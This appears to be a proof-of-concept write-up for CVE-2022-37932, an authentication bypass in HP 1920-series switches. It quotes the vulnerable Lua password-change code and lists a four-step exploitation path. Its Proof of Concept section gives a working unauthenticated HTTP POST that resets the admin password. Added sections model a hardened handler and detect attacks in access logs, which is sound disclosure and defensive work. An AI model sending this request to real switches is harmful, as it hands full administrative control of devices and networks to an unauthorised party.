
CVE-2022-37932 PoC — Hewlett Packard Enterprise OfficeConnect Authorization Vulnerability

Source
Associated Vulnerability
Title: Hewlett Packard Enterprise OfficeConnect Authorization Vulnerability (CVE-2022-37932)
Description: Hewlett Packard Enterprise OfficeConnect is a series of switches from the US company Hewlett Packard Enterprise. Hewlett Packard Enterprise OfficeConnect 1820, 1850 and 1920S network switches contain a security vulnerability: a potential security flaw was discovered that can be exploited remotely to bypass authentication. The following products and versions are affected: versions before PT.02.14; versions before PC.01.22; PO.01.21
Readme
# HP Switch Firmware Authentication Bypass Vulnerability

## CVE-2022-37932
 
**Firmware Version: PD.02.21**  
**Affected Devices: HP 1920 Series Smart Managed Switches**

## Overview

This repository documents a critical authentication bypass vulnerability in HP 1920 Series Smart Managed Switches running firmware version PD.02.21. The vulnerability allows an unauthenticated attacker to change the admin password without prior authentication, effectively allowing complete takeover of the device.

## Technical Details

The vulnerability exists in the `/login/default_password_cfg.lua` script, which handles changing the default password for the device. This script:

1. Accepts form POST requests without checking if the user is authenticated
2. Only verifies that the `oldPwd` parameter matches the default password (which is blank/empty)
3. Directly changes the user's password based on POST parameters

### Vulnerable Code

The key vulnerable section in `default_password_cfg.lua`:

```lua
if (request_method == 'POST') then
  -- No authentication or session checks!
  
  local defaultPassword = fpaux.string_const("FD_USER_MGR_DEFAULT_PASSWORD")
  -- ...

  if form_post.oldPwd ~= defaultPassword then
    errorStatus = "401 Unauthorized"
    errorText = label.old_password_mismatch
  else
    -- Proceeds to change password
    -- ...
  end
end
```

The script lacks critical security controls:
- No session validation
- No CSRF protection
- No rate limiting
- Direct access to password change functionality without authentication
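
To make the three points above concrete, the following Python model (an added illustration, not the switch's Lua and not HPE's fix) reproduces the decision logic quoted from `default_password_cfg.lua` beside a hardened variant. The `Device` class, the session model and the function names `vulnerable_change_password` / `hardened_change_password` are assumptions made for this example; the only fact taken from the page is that the factory default password is blank and that the script compares `oldPwd` against that constant rather than against the password currently stored on the device.

```python
"""Model of the password-change decision in default_password_cfg.lua.

Added illustration, not code from the switch firmware. Both handlers are
simplified Python stand-ins; the Device class, the session model and the
handler names are assumptions made for this example.
"""
import hashlib
import hmac
import os

DEFAULT_PASSWORD = ""  # the page states the factory default password is blank


def _hash(password: str, salt: bytes) -> bytes:
    # Iteration count kept low so the demo runs quickly; raise it in real code.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 20_000)


class Device:
    """Minimal stand-in for the switch's user store (constructed for this example)."""

    def __init__(self):
        self.salt = os.urandom(16)
        self.admin_hash = _hash(DEFAULT_PASSWORD, self.salt)
        self.sessions = set()

    def password_is_default(self) -> bool:
        return hmac.compare_digest(self.admin_hash, _hash(DEFAULT_PASSWORD, self.salt))

    def verify(self, password: str) -> bool:
        return hmac.compare_digest(self.admin_hash, _hash(password, self.salt))

    def login(self, password: str):
        if not self.verify(password):
            return None
        token = os.urandom(16).hex()
        self.sessions.add(token)
        return token


def vulnerable_change_password(dev: Device, form: dict) -> str:
    """Mirrors the logic quoted from default_password_cfg.lua: the only gate is
    that oldPwd equals the *constant* default, regardless of session state or
    of the password currently stored on the device."""
    if form.get("oldPwd", "") != DEFAULT_PASSWORD:
        return "401 Unauthorized"
    if form.get("newPwd") != form.get("confirmPwd"):
        return "400 Bad Request"
    dev.admin_hash = _hash(form["newPwd"], dev.salt)
    return "200 OK"


def hardened_change_password(dev: Device, form: dict, session_token=None) -> str:
    """One way to close the hole (an assumption for this example, not HPE's fix):
    the unauthenticated first-time flow is allowed only while the stored
    password is still the default; afterwards the caller must hold a valid
    session AND present the *current* password, checked against the stored
    hash rather than against a constant."""
    if not dev.password_is_default():
        if session_token not in dev.sessions:
            return "401 Unauthorized"
        if not dev.verify(form.get("oldPwd", "")):
            return "401 Unauthorized"
    if not form.get("newPwd") or form.get("newPwd") != form.get("confirmPwd"):
        return "400 Bad Request"
    dev.admin_hash = _hash(form["newPwd"], dev.salt)
    dev.sessions.clear()  # existing sessions are invalidated after a password change
    return "200 OK"


def demo() -> dict:
    """Walk both handlers through the scenario described in Technical Details."""
    results = {}
    # The legitimate admin sets a password once; the default flow should then be closed.
    dev = Device()
    vulnerable_change_password(dev, {"oldPwd": "", "newPwd": "S3cret!", "confirmPwd": "S3cret!"})
    # Later, an unauthenticated request that still sends a blank oldPwd succeeds:
    results["vulnerable"] = vulnerable_change_password(
        dev, {"oldPwd": "", "newPwd": "other", "confirmPwd": "other"})
    results["vulnerable_password_replaced"] = dev.verify("other")

    dev2 = Device()
    hardened_change_password(dev2, {"oldPwd": "", "newPwd": "S3cret!", "confirmPwd": "S3cret!"})
    results["hardened_unauth"] = hardened_change_password(
        dev2, {"oldPwd": "", "newPwd": "other", "confirmPwd": "other"})
    tok = dev2.login("S3cret!")
    results["hardened_auth"] = hardened_change_password(
        dev2, {"oldPwd": "S3cret!", "newPwd": "N3wS3cret!", "confirmPwd": "N3wS3cret!"}, tok)
    results["login_with_new_password"] = dev2.login("N3wS3cret!") is not None
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The model shows why "compare against the default" is the wrong check: once a real password has been set, the script's comparison no longer says anything about the caller. The hardened variant ties the unauthenticated path to the device's actual state (still at factory default) and otherwise demands both a session and the current password.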

## Proof of Concept

An attacker can exploit this vulnerability using a simple HTTP POST request:

```http
POST /login/default_password_cfg.lua HTTP/1.1
Host: [target-ip]
Content-Type: application/x-www-form-urlencoded
Content-Length: [length]

username=admin&oldPwd=&newPwd=[new-password]&confirmPwd=[new-password]
```

Note: The `oldPwd` parameter is left empty as the default password is blank.

## Impact

This vulnerability allows an unauthenticated attacker to:
1. Change the admin password without knowing any credentials
2. Gain complete administrative control over the device
3. Configure the switch, modify network settings, and potentially compromise the entire network

## Exploitation Path

1. Locate a vulnerable HP 1920 Series switch on the network
2. Send the crafted HTTP POST request directly to the device
3. Admin password is changed to attacker-controlled value
4. Attacker can now log in with the new password and full admin privileges
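
From the defender's side, steps 2 through 4 leave a recognisable trace wherever the switch's HTTP traffic is logged. The following detection helper is an added example, not part of the original PoC: it assumes the management-interface requests are visible to something that writes Combined Log Format lines (a reverse proxy, a network sensor, or a mirrored-port HTTP logger). The sample log lines are constructed, and the login path `/login/login.lua` used for correlation is a placeholder assumed for this example, not a path taken from the page.

```python
"""Detection helper for CVE-2022-37932 exploitation attempts in HTTP access logs.

Added example, not part of the original PoC. ENDPOINT comes from the page;
LOGIN_PATH is an assumed placeholder; SAMPLE_LOG is constructed.
"""
import re
from datetime import datetime, timedelta

ENDPOINT = "/login/default_password_cfg.lua"  # vulnerable script named on the page
LOGIN_PATH = "/login/login.lua"               # assumed login handler (placeholder)
CORRELATION_WINDOW = timedelta(minutes=5)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample: one normal login, one full exploitation sequence, one failed attempt.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2023:09:14:02 +0000] "GET /login/login.lua HTTP/1.1" 200 1820 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2023:09:14:10 +0000] "POST /login/login.lua HTTP/1.1" 200 412 "-" "Mozilla/5.0"
10.0.0.99 - - [12/Mar/2023:11:02:31 +0000] "POST /login/default_password_cfg.lua HTTP/1.1" 200 310 "-" "python-requests/2.28"
10.0.0.99 - - [12/Mar/2023:11:02:35 +0000] "POST /login/login.lua HTTP/1.1" 200 412 "-" "python-requests/2.28"
10.0.0.7 - - [12/Mar/2023:11:30:00 +0000] "POST /login/default_password_cfg.lua HTTP/1.1" 401 95 "-" "curl/7.88"
"""


def parse(line: str):
    """Parse one Combined Log Format line; return None for lines that don't match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    d["status"] = int(d["status"])
    return d


def detect(lines):
    """Return one alert per POST to the vulnerable endpoint.

    Severity rules (constructed for this example):
      - any POST to the endpoint on a provisioned device is 'medium': the
        script is only meant to be called once, during first-time setup;
      - a 200 response raises it to 'high' (the password was actually changed);
      - a successful login from the same source within CORRELATION_WINDOW
        after that 200 raises it to 'critical' (step 4 of the exploitation path).
    """
    events = [e for e in map(parse, lines) if e]
    alerts = []
    for e in events:
        if e["method"] != "POST" or e["path"] != ENDPOINT:
            continue
        severity = "medium"
        if e["status"] == 200:
            severity = "high"
            followed_by_login = any(
                f["ip"] == e["ip"] and f["method"] == "POST" and f["path"] == LOGIN_PATH
                and f["status"] == 200 and e["ts"] < f["ts"] <= e["ts"] + CORRELATION_WINDOW
                for f in events
            )
            if followed_by_login:
                severity = "critical"
        alerts.append({"ip": e["ip"], "time": e["ts"].isoformat(),
                       "status": e["status"], "severity": severity})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

Because the endpoint has exactly one legitimate use (the first-time password change), the simplest durable control is to alert on every POST to it once the device is in service, and to treat a 200 followed by a fresh login from the same address as an active takeover. The correlation is what separates a scanner probing the path from an operator who actually changed the credentials.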

## Credits

I haven't had the time to research who originally discovered this vulnerability; I'm just posting a Proof of Concept.

## Legal Disclaimer

This information is provided for educational purposes only. The author is not responsible for any misuse of this information. Always obtain proper authorization before testing for vulnerabilities.